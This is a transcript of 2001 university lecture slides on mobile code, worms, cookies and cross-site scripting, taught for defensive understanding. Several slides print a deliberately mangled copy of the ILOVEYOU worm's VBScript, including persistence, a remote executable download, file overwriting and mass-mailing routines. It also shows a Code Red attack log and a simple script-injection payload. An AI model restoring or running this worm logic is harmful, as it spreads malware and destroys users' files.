20-771: Computer Security Lecture 5: ATTACK WEEK

Download Report

Transcript 20-771: Computer Security Lecture 5: ATTACK WEEK 

20-771: Computer Security
Lecture 5: ATTACK WEEK
Robert Thibadeau
School of Computer Science
Carnegie Mellon University
Institute for eCommerce, Fall 2000
Lecture 5, 20-771: Computer Security, Fall 2001
1
Today’s lecture
•
•
•
•
Mobile Code
Break (10 min)
Cookies
Cross Machine Scripting
Lecture 5, 20-771: Computer Security, Fall 2001
2
This Week
Chapters 6,7 WS
More on Linux
Lecture 5, 20-771: Computer Security, Fall 2001
3
http://xiotech.ulib.org/class
Lecture 5, 20-771: Computer Security, Fall 2001
4
X.509v3
•
•
Need a public key to open it – I.e., you can
authenticate the source
Contains encrypted information that the
source can communicate to you in privacy
and with authority.
– Authenticated, private, tamperproof, authorization
•
Can be employed as the basis for PKI :
chaining authority
– Pass something up the chain for approval (signing) to
provide the absolute authority
– I.e., the President’s office confirms such and such
directive.
Lecture 5, 20-771: Computer Security, Fall 2001
5
X.509v3 Certificate
-----BEGIN CERTIFICATE----MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx
FTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25ha2UgVG93bjEXMBUG
A1UEChMOU25ha2UgT2lsLCBMdGQxHjAcBgNVBAsTFUNlcnRpZmljYXRlIEF1dGhv
cml0eTEVMBMGA1UEAxMMU25ha2UgT2lsIENBMR4wHAYJKoZIhvcNAQkBFg9jYUBz
bmFrZW9pbC5kb20wHhcNOTkxMDIxMTgyMTUxWhcNMDExMDIwMTgyMTUxWjCBpzEL
MAkGA1UEBhMCWFkxFTATBgNVBAgTDFNuYWtlIERlc2VydDETMBEGA1UEBxMKU25h
a2UgVG93bjEXMBUGA1UEChMOU25ha2UgT2lsLCBMdGQxFzAVBgNVBAsTDldlYnNl
cnZlciBUZWFtMRkwFwYDVQQDExB3d3cuc25ha2VvaWwuZG9tMR8wHQYJKoZIhvcN
AQkBFhB3d3dAc25ha2VvaWwuZG9tMIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKB
gQC554Ro+VH0dJONqljPBW+C72MDNGNy9eXnzejXrczsHs3Pc92Vaat6CpIEEGue
yG29xagb1o7Gj2KRgpVYcmdx6tHd2JkFW5BcFVfWXL42PV4rf9ziYon8jWsbK2aE
+L6hCtcbxdbHOGZdSIWZJwc/1Vs70S/7ImW+Zds8YEFiAwIDAQABo24wbDAbBgNV
HREEFDASgRB3d3dAc25ha2VvaWwuZG9tMDoGCWCGSAGG+EIBDQQtFittb2Rfc3Ns
IGdlbmVyYXRlZCBjdXN0b20gc2VydmVyIGNlcnRpZmljYXRlMBEGCWCGSAGG+EIB
AQQEAwIGQDANBgkqhkiG9w0BAQQFAAOBgQB6MRsYGTXUR53/nTkRDQlBdgCcnhy3
hErfmPNl/Or5jWOmuufeIXqCvM6dK7kW/KBboui4pffIKUVafLUMdARVV6BpIGMI
5LmVFK3sgwuJ01v/90hCt4kTWoT8YHbBLtQh7PzWgJoBAY7MJmjSguYCRt91sU4K
s0dfWsdItkw4uQ==
-----END CERTIFICATE----Lecture 5, 20-771: Computer Security, Fall 2001
6
X.509v3 Opened!
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake
Oil, Ltd, OU=Certificate Authority, CN=Snake Oil
CA/[email protected]
Validity
Not Before: Oct 21 18:21:51 1999 GMT
Not After : Oct 20 18:21:51 2001 GMT
Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake
Oil, Ltd, OU=Webserver Team,
CN=www.snakeoil.dom/[email protected]
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
Lecture 5, 20-771: Computer Security, Fall 2001
7
509 Opened 2
KEY : 00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:
6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad:
cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10:
6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82:
95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15:
57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d:
6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38:
66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22:
65:be:65:db:3c:60:41:62:03 Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Alternative Name:
email:[email protected]
Netscape Comment:
mod_ssl generated custom server certificate
Netscape Cert Type:
SSL Server
Signature Algorithm: md5WithRSAEncryption
7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00:
9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7:
de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7:
c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9:
95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84:
fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68:
d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c:
Lecture 5, 20-771: Computer Security, Fall 2001
8
38:b9
Active Content
Also called “Mobile Code”
•
•
•
•
•
Web Browsers can download and execute
software automatically without warning.
Software may damage user’s system or
violate privacy.
Administrator: This can tunnel through
firewall protections.
Case: U.S. Government came close, within
two weeks, to an executive order that shut
down all “mobile code” in the government.
Failed: This would “dumb down” Federal
employees and make the Government Stupid.
Lecture 5, 20-771: Computer Security, Fall 2001
9
Threats from Mobile Code
•
Purposefully malicious
– Moldovan Connection
» Sexygirls.com and Erotic2000.com
» Downloaded and ran viewer, program hung up phone
and made long distance call to Moldovan, $2 per
minute.
» User taken to site stayed around without knowing
charge.
– “I Love You” Worm : probable accidental escape.
•
Big programs have bugs
– Other people will exploit those bugs
Lecture 5, 20-771: Computer Security, Fall 2001
10
Traditional Threats
•
•
•
•
•
Trojan Horses : Very Serious. Often used for
spying. (e.g., change the login program to
create a back door).
Virus : Code that replicates itself and inserts
into an executable program or file.
Macro viruses : Viruses written in the macro
language of a word processor, or other
trusted program. Becomes infectious on
other documents.
Rabbits : Programs that make many copies of
themselves. Standalone. Denial of Service.
Worms : Similar but spread across network.
Lecture 5, 20-771: Computer Security, Fall 2001
11
Many Many Threats
•
I Love You
– Opening email that says “I Love You” from a person you
know: Trojan Horse
– Reads your address book : Privacy Violation
– Deletes image files : Havoc
– Across Network : Worm
•
Demonstrated
– Microsoft Outlook could execute seriously destructive
and intrusive active content without control of user.
Lecture 5, 20-771: Computer Security, Fall 2001
12
Silent Information Thieves!
Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)
May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net):
lookup failure
May 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com
May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76
May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com
May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130
May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37
May Lecture
30 02:54:36
nageela
connect from u5611a.dorm.ccu.edu.tw
5, 20-771:
Computer ftpd[12051]:
Security, Fall 2001
13
Lecture 5, 20-771: Computer Security, Fall 2001
14
Economic Costs
Computer Economics – 8-01
•
•
•
Love Bug : $8.7 Billion
Melissa $1.2 Billion
Code Red $2.6 Billion
– 250,000 systems in just nine hours on July 19
– 150,000 in 24 on Aug 1 After Warnings
•
Repair costs and loss of productivity and
unknown cost of asset loss
Lecture 5, 20-771: Computer Security, Fall 2001
15
I Love You Code
(virus has been killed)
had name ‘vxryfunny.vbs’
rxm barok -lovxlxttxr(vbx) <i hatx go to
school>
rxm
by: spydxr /
[email protected] / @GRAMMxRSoft Group /
Manila,Philippinxs
dim
fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,d
ow
Sxt fso =
CrxatxObj("Scripting.FilxSystxmObj")
sxt filx =
fso.OpxnTxxt(WScript.ScriptFullnamx,1)
vbscopy=filx.RxadAll
Lecture 5, 20-771: Computer Security, Fall 2001
16
I Love You Code 2
main()
sxt wscr=CrxatxObj("WScript.Shxll")
rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Window
s Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows
Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"
Sxt dirwin = fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)
Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm&"\MSKxrnxl32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystxm&"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()
Lecture 5, 20-771: Computer Security, Fall 2001
17
I Love You Code 3 : rxgruns()
sub rxgruns()
rxgcrxatx
"HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R
un\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"
rxgcrxatx
"HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R
unSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"
Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt
xxplorxr\Download Dirory")
rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start
Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMT
FwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
rxgcrxatx
"HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\R
un\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt
xxplorxr\Main\Start Pagx","about:blank"
xnd sub
Lecture 5, 20-771: Computer Security, Fall 2001
18
I Love You Code 4
Listing the Drives on Your Machine
(there were several of these utility-type spies)
sub listadriv
Dim d,dc,s
Sxt dc = fso.Drivxs
For xach d in dc
If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn
foldxrlist(d.path&"\")
xnd if
Nxxt
listadriv = s
xnd sub
Lecture 5, 20-771: Computer Security, Fall 2001
19
I Love You Code 5
re-writing jpg files
sub inffilxs(foldxrspxc)
sxt f = fso.GxtFoldxr(foldxrspxc)
sxt fc = f.Filxs
for xach f1 in fc
xxt=fso.GxtxxtxnsionNamx(f1.path)
if (xxt="vbs") or (xxt="vbx") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt="jpg") or (xxt="jpxg") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx (did same for mp3 files and others)
Lecture 5, 20-771: Computer Security, Fall 2001
20
I Love You Code 6 : .ini
if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC
will corrupt, if mIRC will"
scriptini.WritxLinx "
corrupt... WINDOWS will aff and
will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry
Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub
Lecture 5, 20-771: Computer Security, Fall 2001
21
I Love You Code 7 : .ini file
if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC
will corrupt, if mIRC will"
scriptini.WritxLinx "
corrupt... WINDOWS will aff and
will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry
Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub
Lecture 5, 20-771: Computer Security, Fall 2001
22
I Love You Code 8 : spread mail
sub sprxadtoxmail()
sxt rxgxdit=CrxatxObj("WScript.Shxll")
sxt out=WScript.CrxatxObj("Outlook.Application")
sxt mapi=out.GxtNamxSpacx("MAPI")
for ctrlists=1 to mapi.AddrxssLists.Count
sxt a=mapi.AddrxssLists(ctrlists)
rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WA
B\"&a)
if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
for ctrxntrixs=1 to a.Addrxssxntrixs.Count
malxad=a.Addrxssxntrixs(x)
rxgad=""
rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\W
AB\"&malxad)
if (rxgad="") thxn
sxt malx=out.CrxatxItxm(0)
malx.Rxcipixnts.Add(malxad)
malx.Subj = "fwd: Jokx"
malx.Body = vbcrlf&""
malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
malx.Sxnd
Sxt out=Nothing
Sxt mapi=Nothing
xnd sub
Lecture 5, 20-771: Computer Security, Fall 2001
23
Silent Attacks
•
•
I should be obvious it would not be hard to
create a silent worm that sends mail on file
systems, files, and address lists (and also all
your mail on your local machine).
We can do this with your web browser too …
… Code Red is only ONE example
Lecture 5, 20-771: Computer Security, Fall 2001
24
Virus Checkers
•
•
•
•
Pattern match in secret ways to find viral
“fingerprints”
Use a technique called “finite state automata”
to create very fast search over your files.
If virus is not known already, it will do
damage.
Finding silent viruses may be hard.
Lecture 5, 20-771: Computer Security, Fall 2001
25
Break!
Lecture 5, 20-771: Computer Security, Fall 2001
26
Authenticode System
•
•
•
•
•
•
Windows 2000
Running code requires a X.509v3 Certificate
with an approved CA
Personal Publishers (ID with Credit Bureau)
Commercial Publishers (Articles of
Incorporation)
Sign a pledge: “reasonable care consistent
with prevailing industry standards to keep
code free from viruses, malicious code, and
other dta that may damage, misappropriate,
or otherwise interfere with a third party’s
operations.”
Remedy: Revoke your Certificate (HA!)
Lecture 5, 20-771: Computer Security, Fall 2001
27
Steps you can Take
•
•
•
•
Don’t run as administrator/root
Use Virus Checkers (but watch those
companies!!!)
Backup Often
Verify the integrity and authenticity of
software.
– A very good idea is to not accept active code without a
certificate that guarantees the author can be found!
– Same principle as “mutually assured destruction” or
“keep the pilot on the plane!” He won’t hurt you if you
can hurt him.
Lecture 5, 20-771: Computer Security, Fall 2001
28
Finally,
•
Even if Adobe is the authentic code
writer/distributor, get them to agree to your
privacy!
Lecture 5, 20-771: Computer Security, Fall 2001
29
Record of URLs you’ve visited
•
Browser History file, document cache, and
cookies
– Unix: spools or /var/adm / Windows : /winnt, /windows,
program files/netscape etc.
– Mobile code can read these.
•
•
•
Organizations firewall or proxy server (most
have logging capability)
ISPs firewall, router, or proxy server.
Each of the remote servers you’ve visited.
Lecture 5, 20-771: Computer Security, Fall 2001
30
Web Server
•
•
•
Standard Logs
– HTTP header information
» Date, From, URI, Referrer, Response Status to
Request
» Also from HTTPS! (The Server Knows!)
– Logs are essential to security
Fancier Logs
– HTTP
» What’s in the forms
» What’s in the responses
Really fancy
– Dynamically changing information based on where
you’ve been.
– Tracking across web servers.
Lecture 5, 20-771: Computer Security, Fall 2001
31
Code Red Log
12.27.8.161 - - [09/Sep/2001:04:07:07
-0400] "GET
/default.ida?XXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXX%u9090%u6858%uc
bd3%u7801%u9090%u6858%ucbd3%u7801%u9
090%u6858%ucbd3%u7801%u9090%u9090%u8
190%u00c3%u0003%u8b00%u531b%u53ff%u0
078%u0000%u00=a HTTP/1.0" 404 278
Lecture 5, 20-771: Computer Security, Fall 2001
32
Code Red I and II
http://www.eeye.com/html/Researc
h/Advisories/AL20010804.html
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u9090
• %u8190
• %u00c3
• %u0003
• %u8b00
Lecture 5, 20-771: Computer Security,
• %u531b
Fall 2001
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
•
%U9090
%u6858
%ucbd3
%u7801
%u9090
%u6858
%ucbd3
%u7801
%u9090
%u6858
%ucbd3
%u7801
%u9090
%u9090
%u8190
%u00c3
%u0003
%u8b00
%u531b
33
Cookies (netscape cookie file)
URL-Invoking-It domain? Path in Server https?
Expiration
Name = value
www.airtime.co.uk FALSE /users/wysywig/ FALSE 968081837 username aaa
www.kbb.com FALSE /kb/ki.dll FALSE 9519638334 zipcode 15638
www.jcpenney.com FALSE /jcp FALSE 126632340 ShopperManager%6Fjcp
SHOPPERMANAGER%6FJCP=6EJSN34316NP100L1RURQ8HHF8MX34
www.buy.com FALSE /bc FALSE 128333061 ShopperManager%6F
SHOPPERMANAGER%6F=VQ8VSKLCWHSN000CM9C9JS7EDVL1
.doubleclick.net TRUE / FALSE 196034991340 id 39609560
.lycos.com TRUE / FALSE 161735952 CyberTargetAnonymous
LYC000AFBAE77275BF6D2734BFCF563A16
.cmgi.com TRUE / FALSE 16173595634 CyberGlobalAnonymous
CTG00017D567763405BF1FB34F8BFCD8B1D33
.webcrawler.com TRUE / FALSE 9342341600 registered no
.webcrawler.com TRUE / FALSE 9342341600 UID 210076B35C89A5C
.microsoft.com TRUE / FALSE 1065303482 MC1
GUID=DF160779710D118B1808006BB734F3F
.washingtonpost.com TRUE / FALSE 9342951343 RMID 98c81c8d3606d690
www.americanbible.org FALSE / FALSE 16308113498 Int 343 346 38 3 343 38 30
3 334 68 5 3
www.americanbible.org FALSE / FALSE 1630811600 User Profile
F633C7686DA1FDBE85880034CDB11
Lecture 5, 20-771: Computer Security, Fall 2001
34
Cookies (netscape cookie file)
URL-Invoking-It domain?
Path in Server
https?
Expiration
Name = value
www.antiquebooks.net FALSE / FALSE 938368777 ulantique 7-1-6-win-ns
classics.mit.edu FALSE / FALSE 934285095 ICA_last_work Homer.iliad
.jcpenny.com TRUE / FALSE 60516333438 SITESERVER
ID=69bcf8f963456b19fffdf1ff19f
.amazon.com TRUE / FALSE 6086797993 ubid-main 06-6073435981034
nonprofit.guidestar.org FALSE / FALSE 613723673 CFID 95690
.google.com TRUE / FALSE 6134736834347 ID 34816dff31190ff80
.cmu.edu TRUE / FALSE 6051263400 SITESERVER
ID=f8185834df6bac5f80a793a534c18
.waterhouse.com TRUE / FALSE 963585098 accountno 35869873
tracking.carprices.com FALSE / FALSE 9634234581 PARTNER CARPRICES
tracking.carprices.com FALSE / FALSE 9634234581 MEMB_ID -1
tracking.carprices.com FALSE / FALSE 9634234581 USER 10.8.1.35-1
tracking.carprices.com FALSE / FALSE 9634234578 RETURN VISITOR
Lecture 5, 20-771: Computer Security, Fall 2001
35
Cookies :
Server Writes to Browser
Set-Cookie: NAME=VALUE; expires=DATE; path=PATH;
domain=DOMAIN_NAME; secure
NAME=VALUE
expires=DATE
domain=DOMAIN_NAME
The default value of domain is the host name of the server which
generated the cookie response.
path=PATH
The path attribute is used to specify the subset of URLs in a
domain for which the cookie is valid.
secure
If a cookie is marked secure, it will only be transmitted if the
communications channel with the host is a secure one. Currently
this means that secure cookies will only be sent to HTTPS (HTTP
over SSL) servers. If secure is not specified, a cookie is
considered safe to be sent in the clear over unsecured channels.
Lecture 5, 20-771: Computer Security, Fall 2001
36
Browser Volunteers Cookie to
Server!
•
•
If Browser visits the URL again, it volunteers
cookie name and contents to the URL
Cookie: NAME1=OPAQUE_STRING1;
•
Server Database can contain
NAME2=OPAQUE_STRING2 ...
–
–
–
–
Cookie Name
Opaque String
Who (what IP/Host/User/etc) reported it
When
Lecture 5, 20-771: Computer Security, Fall 2001
37
Cookie Source Code
www.mozilla.org
host \t isDomain \t path \t xxx \t expires \t name \t cookie from
http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078
JavaScript Interface! Red - read only
Name
Type
Description
path
string
path the cookie applies to
domain
string
domain the cookie applies to
name
string
name of the cookie
value
string
value of the cookie
expires
string
date the cookie expires
url
string
url setting the cookie TROJAN HORSE OPPORTUNITY!
isSecure
boolean
the cookie is sent over secure connections only
isDomain
boolean
the cookie has a domain attribute
prompt
preference
accept()
reject()
ask()
confirm()
boolean
int
user has configured prefs to throw cookie confirm dialog
the user's cookie acceptance value
method
allows the cookie to be set
method
causes the cookie not to be set
method
prompt a netlib confirmation dialog
(happens during netlib set cookie execution)
method
prompt a javascript confirmation dialog
(happens during javascript function execution)
Lecture 5, 20-771: Computer Security, Fall 2001
38
•
•
•
•
•
•
•
•
•
Cookies - Notes
Multiple Set-Cookie headers in single server response.
Same path but different names will add additional mappings.
Higher-level path value not override specific path mappings.
Expires header lets client purge the mapping but not required.
Number of cookies that a client can store at any one time.
– 300 total cookies
– 4 kilobytes per cookie
– 20 cookies per server domain.
CGI script deletes a cookie by returning same cookie expired time.
– This requirement makes it difficult for anyone but the originator of a cookie to
delete a cookie.
Set-cookie response header should never be cached.
If proxy server receives response containing Set-cookie, it should
propagate the Set-cookie header to the client, regardless of
whether the response was 304 (Not Modified) or 200 (OK).
Similarly, if a client request contains a Cookie: header, it should be
forwarded through a proxy, even if the conditional If-modified-since
request is being made.
Lecture 5, 20-771: Computer Security, Fall 2001
39
Two Sides
•
•
•
•
Buyer wants things without exposing any
information he discloses to any use other
than what they MUST have to give him the
things he wants. (Cryptophilia)
Seller wants to know as much about Buyer as
possible because this gives him control over
Buyers and therefore revenue. He can also
sell this information (e.g., to advertisers). He
wants unrestricted use of this information.
BUT, Buyers now collect information on
Sellers and misuse that (The Sky is Falling.)
An Agreement is bilateral. The Internet can
make possible agreements public and thereby
expose both Sellers and Buyers to violations.
Lecture 5, 20-771: Computer Security, Fall 2001
40
Cross Site Scripting
•
•
•
•
Same as cross machine cookies
Fill in a form with a script (<script>
<Alert(‘Gotcha!’);</script>
Web Server returns blindly printing script
Filter these characters out :
< > " ' % ; ) ( & + -
But, What about the situation where you want
somebody to click you and know where they
clicked from (double click).
Lecture 5, 20-771: Computer Security, Fall 2001
41